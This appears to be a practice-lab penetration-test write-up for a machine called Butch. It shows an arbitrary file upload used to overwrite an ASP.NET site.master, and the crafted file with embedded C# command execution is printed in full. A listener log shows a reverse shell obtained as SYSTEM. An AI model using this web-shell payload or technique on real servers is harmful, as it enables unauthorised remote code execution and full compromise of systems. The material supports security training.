Arbitrary File Upload
It seems that the site.master file resides in the web root. Additionally, file upload is possible and made to the webroot directory. By extension, It might be possible to overwrite the site.master file, which could contain embedded C# code as the site.master.txt file explicitly states the backend is C#. If this overwrite is successful, reloading the web page may execute the embedded arbitrary code, leading to RCE.
“
<%@ Language="C#" src="site.master.cs" Inherits="MyNamespaceMaster.MyClassMaster" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head runat="server">
<title>Butch</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="application-name" content="Butch">
<meta name="author" content="Butch">
<meta name="description" content="Butch">
<meta name="keywords" content="Butch">
<link media="all" href="style.css" rel="stylesheet" type="text/css" />
<link id="favicon" rel="shortcut icon" type="image/png" href="favicon.png" />
</head>
<body>
<div id="wrap">
<div id="header">Welcome to Butch Repository</div>
<div id="main">
<div id="content">
<br />
<asp:contentplaceholder id="ContentPlaceHolder1" runat="server"></asp:contentplaceholder>
<br />
</div>
</div>
</div>
</body>
</html>
<%
string stdout = "";
string cmd = "whoami";
System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c " + cmd);
procStartInfo.RedirectStandardOutput = true;
procStartInfo.UseShellExecute = false;
procStartInfo.CreateNoWindow = true;
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo = procStartInfo;
p.Start();
stdout = p.StandardOutput.ReadToEnd();
Response.Write(stdout);
%>/Practice/Butch/3-Exploitation/attachments/{8C10A27F-960F-4DB5-83D6-D630AA166588}.png)
Uploading a crafted site.master file with an embedded payload
Reloading pages would execute, cmd /c whoami
/Practice/Butch/3-Exploitation/attachments/Pasted-image-20250227002014.png)
Code execution confirmed
Uploading the updated site.master file
/Practice/Butch/3-Exploitation/attachments/{150155D3-5A25-4015-B65E-FF45F2E2FFB8}.png)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/butch]
└─$ nnc 450
listening on [any] 450 ...
connect to [192.168.45.221] from (UNKNOWN) [192.168.238.63] 49696
Microsoft Windows [Version 10.0.17763.1217]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv> whoami
whoami
nt authority\system
c:\windows\system32\inetsrv> hostname
hostname
butch
c:\windows\system32\inetsrv> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::86c:e5b9:f976:d9fa%6
IPv4 Address. . . . . . . . . . . : 192.168.238.63
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.238.254System level compromise